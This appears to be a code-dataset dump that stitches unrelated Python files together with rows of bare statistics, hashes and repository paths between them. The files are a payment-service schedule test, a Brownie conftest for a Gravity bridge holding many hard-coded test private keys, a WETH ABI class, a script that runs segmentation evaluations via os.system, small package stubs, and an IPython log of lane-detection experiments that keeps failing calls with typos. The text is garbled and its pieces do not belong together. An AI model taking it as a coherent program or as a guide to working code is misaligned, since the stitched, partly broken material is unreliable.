        {'up': '30 6 * * 7', 'down': '30 21 * * 7'},
    ]
    # 1988-07-29 11:30pm US/Pacific Friday / 1988-07-30 5:30am UTC
    check_date: datetime = datetime(1988, 7, 30, 5, 30)
    with app.app_context():
        service_name = 'PAYBC'
        # Context-managed patch: the original started the patcher and never stopped it at all.
        with patch('pay_api.services.status_service.StatusService.get_schedules') as mock_get:
            mock_get.return_value = schedule_json
            get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
        assert get_response is not None
        assert get_response['service'] == service_name
        assert not get_response['current_status']
        timezone = pytz.timezone('US/Pacific')
        assert get_response['current_down_time'] == timezone.localize(datetime(1988, 7, 29, 21, 30)).timestamp()
        assert get_response['next_up_time'] == timezone.localize(datetime(1988, 7, 30, 6, 30)).timestamp()
        assert get_response['next_down_time'] == 0
| 37.296736
| 112
| 0.666958
| 1,723
| 12,569
| 4.6361
| 0.094602
| 0.092263
| 0.102153
| 0.030045
| 0.892213
| 0.882699
| 0.860916
| 0.838758
| 0.815974
| 0.811217
| 0
| 0.065885
| 0.212666
| 12,569
| 336
| 113
| 37.407738
| 0.741209
| 0.179012
| 0
| 0.780749
| 0
| 0
| 0.146638
| 0.046265
| 0
| 0
| 0
| 0
| 0.278075
| 1
| 0.080214
| false
| 0
| 0.02139
| 0
| 0.101604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f5ac3d4e5bfef6e496ab1736605fc1aea3ec54f7
| 15,791
|
py
|
Python
|
solidity/tests/conftest.py
|
WilliamXieCrypto/gravity-bridge
|
9bf8d5df809364a1e465070a8cbb10cc888e8a21
|
[
"Apache-2.0"
] | 31
|
2021-05-18T14:39:18.000Z
|
2022-01-28T17:01:49.000Z
|
solidity/tests/conftest.py
|
WilliamXieCrypto/gravity-bridge
|
9bf8d5df809364a1e465070a8cbb10cc888e8a21
|
[
"Apache-2.0"
] | 172
|
2021-05-06T15:37:46.000Z
|
2022-03-31T17:51:17.000Z
|
solidity/tests/conftest.py
|
WilliamXieCrypto/gravity-bridge
|
9bf8d5df809364a1e465070a8cbb10cc888e8a21
|
[
"Apache-2.0"
] | 22
|
2021-05-10T19:44:47.000Z
|
2022-03-08T14:20:29.000Z
|
#!/usr/bin/python3
import pytest
import brownie
from brownie import web3, TestLogicContract, SimpleLogicBatchMiddleware, Gravity, TestERC20A, ReentrantERC20, TestTokenBatchMiddleware, HashingTest, Contract
from eth_abi import encode_abi
from eth_account.messages import encode_defunct
@pytest.fixture(scope="session")
def signers(accounts):
    """Session fixture: brownie accounts backed by the fixed test private keys.

    If ``accounts`` already holds at least as many entries beyond the key
    count, reuse its tail; otherwise add one account per key and fund each
    from accounts[0].
    """
    privKeys = getPrivKeys()
    acc_len = len(accounts)
    add_len = len(privKeys)
    if acc_len > add_len:
        # NOTE(review): assumes the trailing add_len accounts were created from
        # these same keys by an earlier call — TODO confirm.
        return accounts[acc_len - add_len:]
    for i in range(0, add_len):
        accounts.add(privKeys[i])
        # Fund the freshly added account (3466666 * 10**18 wei).
        accounts[0].transfer(accounts[acc_len + i], 3466666 * 10 ** 18)
    return accounts[acc_len:]
def getPrivKeys():
    """Return the 157 deterministic private keys used for the test signers.

    The list is ten hand-picked keys followed by three consecutive runs that
    share a 31-byte prefix and differ only in the final byte, plus one
    trailing key. Generated here instead of spelled out literally; the
    resulting list is identical, element for element.
    """
    keys = [
        "0xc5e8f61d1ab959b397eecc0a37a6517b8e67a0e7cf1f4bce5591f3ed80199122",
        "0xd49743deccbccc5dc7baa8e69e5be03298da8688a15dd202e20f15d5e0e9a9fb",
        "0x23c601ae397441f3ef6f1075dcb0031ff17fb079837beadaf3c84d96c6f3e569",
        "0xee9d129c1997549ee09c0757af5939b2483d80ad649a0eda68e8b0357ad11131",
        "0x87630b2d1de0fbd5044eb6891b3d9d98c34c8d310c852f98550ba774480e47cc",
        "0x275cc4a2bfd4f612625204a20a2280ab53a6da2d14860c47a9f5affe58ad86d4",
        "0x7f307c41137d1ed409f0a7b028f6c7596f12734b1d289b58099b99d60a96efff",
        "0x2a8aede924268f84156a00761de73998dac7bf703408754b776ff3f873bcec60",
        "0x8b24fd94f1ce869d81a34b95351e7f97b2cd88a891d5c00abc33d0ec9501902e",
    ]
    # (prefix, first suffix byte, last suffix byte), suffix rendered as two
    # lowercase hex digits appended to the prefix.
    runs = [
        ("0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b290", 0x85, 0x8f),
        ("0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf", 0x00, 0x5d),
        ("0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb1", 0x00, 0x29),
    ]
    for prefix, lo, hi in runs:
        keys.extend("{}{:02x}".format(prefix, b) for b in range(lo, hi + 1))
    keys.append("0xb1bab011e03a9862664706fc3bbaa1b16651528e5f0e7fbfcbfdd8be302a13e7")
    return keys
def getSignerAddresses(signers):
    """Return the ``address`` attribute of each signer, preserving order.

    Replaces the original ``for i in range(len(...))`` index loop with the
    idiomatic list comprehension; behavior is unchanged.
    """
    return [signer.address for signer in signers]
def makeCheckpoint(validators, powers, valsetNonce, gravityId, rewardAmount=0, rewardToken="0x0000000000000000000000000000000000000000"):
    """Compute the keccak checkpoint hash of a validator set.

    ABI-encodes (gravityId, b"checkpoint", valsetNonce, validators, powers,
    rewardAmount, rewardToken) and hashes the encoding with web3.keccak.
    """
    encoded = encode_abi(
        ["bytes32", "bytes32", "uint256", "address[]", "uint256[]", "uint256", "address"],
        [gravityId, b"checkpoint", valsetNonce, validators, powers, rewardAmount, rewardToken],
    )
    return web3.keccak(encoded)
def examplePowers():
    """Return a fixed example validator power distribution for tests.

    125 non-increasing powers that sum to exactly 10,000.
    """
    return [
        707, 621, 608, 439, 412, 407, 319, 312, 311, 303,
        246, 241, 224, 213, 194, 175, 173, 170, 154, 149,
        139, 123, 119, 113, 110, 107, 105, 104, 92, 90,
        88, 88, 88, 85, 85, 84, 82, 70, 67, 64,
        59, 58, 56, 55, 52, 52, 52, 50, 49, 44,
        42, 40, 39, 38, 37, 37, 36, 35, 34, 33,
        33, 33, 32, 31, 30, 30, 29, 28, 27, 26,
        25, 24, 23, 23, 22, 22, 22, 21, 21, 20,
        19, 18, 17, 16, 14, 14, 13, 13, 11, 10,
        10, 10, 10, 10, 9, 8, 8, 7, 7, 7,
        6, 6, 5, 5, 5, 5, 5, 5, 4, 4,
        3, 2, 1, 1, 1, 1, 1, 1, 1, 1,
        1, 1, 1, 1, 1,
    ]
def deployContracts(signers, gravityId, validators, powers, powerThreshold):
    """Deploy a TestERC20A token and a Gravity bridge seeded with *validators*.

    Returns (gravity, testERC20, checkpoint) where checkpoint is the expected
    initial valset checkpoint (nonce 0).
    """
    erc20 = TestERC20A.deploy({"from": signers[0]})
    validator_addresses = getSignerAddresses(validators)
    expected_checkpoint = makeCheckpoint(validator_addresses, powers, 0, gravityId)
    bridge = Gravity.deploy(
        gravityId, powerThreshold, validator_addresses, powers, {"from": signers[0]}
    )
    return bridge, erc20, expected_checkpoint
def signHash(signers, hash):
    """Sign *hash* as an EIP-191 "defunct" message with every signer.

    Returns a list of [v, r, s] triples, one per signer, in signer order.
    """
    signatures = []
    for signer in signers:
        signed = web3.eth.account.sign_message(encode_defunct(hash), signer.private_key)
        signatures.append([signed.v, signed.r, signed.s])
    return signatures
def bstring2bytes32(str):
    """ABI-encode *str* as a single bytes32 value (left-justified, zero-padded).

    NOTE: the parameter name shadows the builtin ``str``; kept for
    backward compatibility with keyword callers.
    """
    return encode_abi(["bytes32"], [str])
| 45.771014
| 195
| 0.765373
| 508
| 15,791
| 23.748032
| 0.629921
| 0.001989
| 0.002735
| 0.003316
| 0.005056
| 0.004559
| 0.001078
| 0.001078
| 0.001078
| 0.001078
| 0
| 0.476117
| 0.182002
| 15,791
| 344
| 196
| 45.90407
| 0.457846
| 0.001077
| 0
| 0.189024
| 0
| 0
| 0.664997
| 0.659608
| 0
| 1
| 0.659608
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.015244
| 0.009146
| 0.067073
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f5f612bf2d0515fd9d3d46cf24ad8cf3e14dd227
| 2,860
|
py
|
Python
|
shadowlands/erc20/weth.py
|
carver/shadowlands-core
|
8931254da4af7e4cde3594fe1bcbf92a34ac02a4
|
[
"MIT"
] | null | null | null |
shadowlands/erc20/weth.py
|
carver/shadowlands-core
|
8931254da4af7e4cde3594fe1bcbf92a34ac02a4
|
[
"MIT"
] | null | null | null |
shadowlands/erc20/weth.py
|
carver/shadowlands-core
|
8931254da4af7e4cde3594fe1bcbf92a34ac02a4
|
[
"MIT"
] | null | null | null |
from shadowlands.contract.erc20 import Erc20
class Weth(Erc20):
    """Wrapped Ether (WETH) ERC-20 contract wrapper.

    Inherits generic token behaviour from ``Erc20`` and pins the contract's
    deployment address and ABI.
    """
    # WETH deployment address on the Kovan testnet.
    KOVAN='0xd0A1E359811322d97991E03f863a0C30C2cF029C'
    # Full WETH contract ABI as a JSON string: the ERC-20 core functions plus
    # the WETH-specific deposit/withdraw, the payable fallback, and the
    # Approval/Transfer/Deposit/Withdrawal events.
    ABI='[{"constant":true,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"guy","type":"address"},{"name":"wad","type":"uint256"}],"name":"approve","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"src","type":"address"},{"name":"dst","type":"address"},{"name":"wad","type":"uint256"}],"name":"transferFrom","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"wad","type":"uint256"}],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"balanceOf","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"dst","type":"address"},{"name":"wad","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"deposit","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"},{"name":"","type":"address"}],"name":"allowance","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"},{"anonymous":false,"inputs":[{"indexed":true,"name":"src","type":"address"},{"indexed":true,"name":"guy","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"src","type":"address"},{"indexed":true,"name":"dst","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"dst","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Deposit","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"src","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Withdrawal","type":"event"}]'
| 238.333333
| 2,733
| 0.63986
| 306
| 2,860
| 5.980392
| 0.153595
| 0.078142
| 0.147541
| 0.078689
| 0.826776
| 0.778689
| 0.769945
| 0.751913
| 0.736066
| 0.620219
| 0
| 0.024321
| 0.008042
| 2,860
| 11
| 2,734
| 260
| 0.620726
| 0
| 0
| 0
| 0
| 0.25
| 0.968816
| 0.968816
| 0
| 0
| 0.014716
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
eb0693aaf5317fbddb472404d4ffb0b7714e5185
| 515
|
py
|
Python
|
eval_mosmed_timm-regnetx_002_Posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_Posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_Posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os

# Evaluate MosMed UNet++ (timm-regnetx_002 encoder, Posterize augmentation)
# on all five cross-validation folds by shelling out to main.py once per
# fold-specific config file.
_CMD_TEMPLATE = (
    "python main.py --configs "
    "configs/eval_mosmed_unetplusplus_timm-regnetx_002_{}_Posterize.yml"
)
ls = [_CMD_TEMPLATE.format(fold) for fold in range(5)]
for l in ls:
    os.system(l)
| 46.818182
| 97
| 0.838835
| 80
| 515
| 5.025
| 0.3
| 0.124378
| 0.149254
| 0.236318
| 0.890547
| 0.890547
| 0.890547
| 0.890547
| 0.890547
| 0.890547
| 0
| 0.041322
| 0.060194
| 515
| 11
| 98
| 46.818182
| 0.789256
| 0
| 0
| 0
| 0
| 0
| 0.872093
| 0.629845
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eb2470f98dea2c7450f17b511992696f37ee0ead
| 173
|
py
|
Python
|
opsep/__init__.py
|
opsep/opsep-python
|
561f7e0bd3f3149ec1ed56bd049f572d6dffbfdd
|
[
"Apache-2.0"
] | null | null | null |
opsep/__init__.py
|
opsep/opsep-python
|
561f7e0bd3f3149ec1ed56bd049f572d6dffbfdd
|
[
"Apache-2.0"
] | null | null | null |
opsep/__init__.py
|
opsep/opsep-python
|
561f7e0bd3f3149ec1ed56bd049f572d6dffbfdd
|
[
"Apache-2.0"
] | null | null | null |
# Public API of the opsep package: re-export the hybrid encryption helpers
# and the HTTP client primitives so callers can `from opsep import ...`.
from .main import opsep_hybrid_decrypt, opsep_hybrid_encrypt, opsep_hybrid_encrypt_with_auditlog
from .opsep import RateLimitError, BadRequestError, OPSEP_URL, fetch_pubkey
| 57.666667
| 96
| 0.884393
| 23
| 173
| 6.217391
| 0.608696
| 0.230769
| 0.251748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075145
| 173
| 2
| 97
| 86.5
| 0.89375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dec168735523f8619b5d20959855f1d0f930ae53
| 46
|
py
|
Python
|
utils/system.py
|
chung1905/skynet-chatbot
|
932a45f81f1bb78a49d1c968d325319fd3c4cc73
|
[
"MIT"
] | 1
|
2020-04-16T08:37:19.000Z
|
2020-04-16T08:37:19.000Z
|
utils/system.py
|
chung1905/skynet-chatbot
|
932a45f81f1bb78a49d1c968d325319fd3c4cc73
|
[
"MIT"
] | null | null | null |
utils/system.py
|
chung1905/skynet-chatbot
|
932a45f81f1bb78a49d1c968d325319fd3c4cc73
|
[
"MIT"
] | 1
|
2020-04-16T08:37:24.000Z
|
2020-04-16T08:37:24.000Z
|
def get_system() -> str:
    """Return the platform identifier string used by this project.

    Hard-coded to 64-bit Linux. NOTE(review): extend here if other
    platforms are ever supported.
    """
    return 'linux64'
| 15.333333
| 24
| 0.630435
| 6
| 46
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0.217391
| 46
| 2
| 25
| 23
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
9d42ac88a9382bf370502135970209926a3835fe
| 22,989
|
py
|
Python
|
ipython_logs/log_02-06-19_14-04-00.py
|
CaffeineHighZombie/Autonomous-Car-ND-Advanced-Lane-Lines
|
7c85e94bfae7cf6ac6c18f390dd00c3e896c60b0
|
[
"MIT"
] | null | null | null |
ipython_logs/log_02-06-19_14-04-00.py
|
CaffeineHighZombie/Autonomous-Car-ND-Advanced-Lane-Lines
|
7c85e94bfae7cf6ac6c18f390dd00c3e896c60b0
|
[
"MIT"
] | null | null | null |
ipython_logs/log_02-06-19_14-04-00.py
|
CaffeineHighZombie/Autonomous-Car-ND-Advanced-Lane-Lines
|
7c85e94bfae7cf6ac6c18f390dd00c3e896c60b0
|
[
"MIT"
] | null | null | null |
# IPython log file (cleaned so the transcript parses as a Python module:
# two stray trailing parentheses and a wrong cv2 constant fixed; the
# session's duplicate/exploratory lines are preserved as recorded).
get_ipython().run_line_magic('logstart', '')
from main import *
pipeline
image_cal = CalibrateCamera()
get_ipython().run_line_magic('load_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
from main import *
check
from main import *
check
check
check
from main import *
check
image_cal = CalibrateCamera()
image_cal.calculate_imgpoints_over_directory()
image_cal.calculate_calibration_parameters()
img = mpimg.imread("./test_images/straight_lines2.jpg")
plt.imshow(img)
plt.show()
ksize = 5
from main import *
from main import *
ksize = 5
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
plot_image_side_by_side(img, gray)
# NOTE(review): `image` is not defined at this point in the session; these
# four calls raised NameError and were re-run with `img` just below.
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
# FIX: removed a stray trailing ')' that made this line a SyntaxError.
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
gradx = abs_sobel_thresh(img, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(img, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(img, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(0.7, 1.3))
plot_image_side_by_side(img, gradx)
plot_image_side_by_side(img, grady)
plot_image_side_by_side(img, mag_binary)
plot_image_side_by_side(img, dir_binary)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
plot_image_side_by_side(img, combined)
plot_image_side_by_side(img, dir_binary)
plot_image_side_by_side(img, mag_binary)
plot_image_side_by_side(img, grady)
plot_image_side_by_side(img, gradx)
plot_image_side_by_side(img, combined)
color_binary = pipeline(img)
plt.imshow(color_binary)
plt.show()
# FIX: cv2.RGB2GRAY does not exist (AttributeError); the session corrected
# it to cv2.COLOR_RGB2GRAY on the very next line.
gray = cv2.cvtColor(color_binary, cv2.COLOR_RGB2GRAY)
gray = cv2.cvtColor(color_binary, cv2.COLOR_RGB2GRAY)
plt.imshow(gray)
plt.show()
# FIX: removed a stray trailing ')' (SyntaxError in the raw log).
plt.imshow(gray, cmap="gray")
plt.imshow(gray, cmap="gray")
plt.show()
def sobel_test(img, ksize=5):
    """Plot *img* beside its combined gradient/magnitude/direction binary mask.

    FIX: the original body referenced the undefined name ``image`` instead of
    the ``img`` parameter, so every call raised NameError (the session later
    redefined the function with a matching parameter name).
    """
    gradx = abs_sobel_thresh(img, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grady = abs_sobel_thresh(img, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_binary = mag_thresh(img, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_binary)
    # Keep pixels where both axis gradients fire, or where magnitude and
    # direction both fire.
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    plot_image_side_by_side(img, combined)
# Sweep the Sobel diagnostic over every saved test image.
image_list = glob.glob("./test_images/*.jpg")
image_list
for image in image_list:
    sobel_test(image)
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_test(image_read)
for image in image_list:
    image_read = mpimg.imread(image)
    plt.imshow(image_read)
    plt.show()
    sobel_test(image_read)
image_list[0]
image = mpimg.imread(image_list[0])
# FIX: '(20. 100)' — a '.' typed instead of ',' — was a SyntaxError in the
# raw log; the session re-typed the line correctly right after.
gradx = abs_sobel_thresh(image, orient="x", sobel_kernel=ksize, thresh=(20, 100))
gradx = abs_sobel_thresh(image, orient="x", sobel_kernel=ksize, thresh=(20, 100))
sobel_test(image)
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_test(image_read)
sobel_test(mpimg.imread(image_list[5]))
image_list[0]
img_l = image_list[5]
img_l
img_l_read = mpimg.imread(img_l)
# FIX: 'sobel_tes' was a NameError typo for sobel_test.
sobel_test(img_l)
sobel_test(img_l)
sobel_test(img_l_read)
def sobel_test(image, ksize=5):
    """Plot *image* beside its combined Sobel gradient/magnitude/direction mask."""
    grad_x = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grad_y = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    both_gradients = (grad_x == 1) & (grad_y == 1)
    strong_and_aligned = (mag_mask == 1) & (dir_mask == 1)
    combined[both_gradients | strong_and_aligned] = 1
    plot_image_side_by_side(image, combined)
# Re-run the (fixed) sobel_test over every saved test image.
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_test(image_read)
def hsv_test(image):
    """Show *image* and its color-pipeline binary output side by side."""
    binary = pipeline(image)
    fig, (left_ax, right_ax) = plt.subplots(1, 2, figsize=(24, 9))
    fig.tight_layout()
    left_ax.imshow(image)
    left_ax.set_title('Original Image', fontsize=50)
    right_ax.imshow(binary)
    right_ax.set_title('Combined Image', fontsize=50)
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
# Preview the color-pipeline output for each test image.
for image in image_list:
    image_read = mpimg.imread(image)
    hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Run the color pipeline, then plot its output beside the combined Sobel mask."""
    processed = pipeline(inp_img)
    grad_x = abs_sobel_thresh(processed, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grad_y = abs_sobel_thresh(processed, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(processed, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(processed, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((grad_x == 1) & (grad_y == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    # Note: plots the pipeline output (not the raw input) against the mask.
    plot_image_side_by_side(processed, combined)
# FIX: the first loop called 'soble_plus_hsv_test' — a NameError typo for
# sobel_plus_hsv_test; the session immediately re-ran the loop with the
# correct name (second loop below, preserved as recorded).
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Run the color pipeline, then plot the ORIGINAL image beside the combined Sobel mask."""
    processed = pipeline(inp_img)
    grad_x = abs_sobel_thresh(processed, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grad_y = abs_sobel_thresh(processed, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(processed, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(processed, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((grad_x == 1) & (grad_y == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    plot_image_side_by_side(inp_img, combined)
# Re-run the latest sobel_plus_hsv_test over all test images.
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Three-panel diagnostic: original, pipeline output, combined Sobel mask."""
    processed = pipeline(inp_img)
    grad_x = abs_sobel_thresh(processed, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grad_y = abs_sobel_thresh(processed, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(processed, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(processed, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((grad_x == 1) & (grad_y == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    fig, panels = plt.subplots(1, 3, figsize=(24, 9))
    fig.tight_layout()
    panels[0].imshow(inp_img)
    panels[1].imshow(processed)
    panels[2].imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
# Render the three-panel diagnostic for each test image.
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Six-panel diagnostic: original, pipeline output, and Sobel masks.

    NOTE(review): ``plt.subplots(2, 3)`` returns a 2x3 axes *array*; flat
    unpacking into six names raises ValueError at call time. The session's
    later redefinition switches to nested unpacking — confirm before reuse.
    """
    image = pipeline(inp_img)
    gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_binary)
    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
    f, (ax1, ax2, ax3, ax4, ax5, ax6) = plt.subplots(2, 3, figsize=(24, 9))
    f.tight_layout()
    ax1.imshow(inp_img)
    ax2.imshow(image)
    ax3.imshow(gradx, cmap="gray")
    ax4.imshow(grady, cmap="gray")
    ax5.imshow(dir_binary, cmap="gray")
    ax6.imshow(combined, cmap="gray")
    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
    plt.show()
# Render the six-panel diagnostic for each test image.
for image in image_list:
    image_read = mpimg.imread(image)
    sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
    """Six-panel (2x3) diagnostic: original, pipeline output, x/y gradients, direction mask, combined mask."""
    processed = pipeline(inp_img)
    grad_x = abs_sobel_thresh(processed, orient='x', sobel_kernel=ksize, thresh=(20, 100))
    grad_y = abs_sobel_thresh(processed, orient='y', sobel_kernel=ksize, thresh=(20, 100))
    mag_mask = mag_thresh(processed, sobel_kernel=ksize, mag_thresh=(30, 100))
    dir_mask = dir_threshold(processed, sobel_kernel=ksize, thresh=(0.7, 1.3))
    combined = np.zeros_like(dir_mask)
    combined[((grad_x == 1) & (grad_y == 1)) | ((mag_mask == 1) & (dir_mask == 1))] = 1
    fig, axes = plt.subplots(2, 3, figsize=(24, 9))
    fig.tight_layout()
    panels = [ax for row in axes for ax in row]
    panels[0].imshow(inp_img)
    panels[1].imshow(processed)
